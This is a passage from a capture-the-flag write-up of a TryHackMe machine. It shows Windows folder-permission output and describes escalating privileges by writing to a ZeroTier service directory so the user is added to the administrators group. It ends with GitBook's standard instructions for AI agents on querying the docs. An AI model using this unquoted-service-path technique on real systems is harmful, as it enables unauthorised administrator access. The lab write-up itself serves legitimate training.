          NT SERVICE\TrustedInstaller:(I)(F)
          NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
          NT AUTHORITY\SYSTEM:(I)(F)
          NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
          BUILTIN\Administrators:(I)(F)
          BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
          BUILTIN\Users:(I)(RX)
          BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
          CREATOR OWNER:(I)(OI)(CI)(IO)(F)
          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
          APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
          APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files
PS C:\Program Files (x86)>

```

We can write to the Zero Tier directory will be executed first.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fz8SavsBh1hXXfCIZYybF%2Fimage.png?alt=media&amp;token=0e0e16fe-78f6-47f9-93a6-4997e0ac4e6d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTgkDxe954YLbQuo2GFD0%2Fimage.png?alt=media&amp;token=a66e490c-72b0-4496-b7bb-034b21cf905a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FG9gEcYIyTmJQNgx2P0mx%2Fimage.png?alt=media&amp;token=b5dbf836-1120-4e89-b680-7713702a0ecf" alt=""><figcaption></figcaption></figure>

the service was not started properly but we are added to the administrators group.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUArq2zu4jv6U0gqdUv0u%2Fimage.png?alt=media&amp;token=43462405-185d-4b99-815b-bc99d60388fb" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-enterprise.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
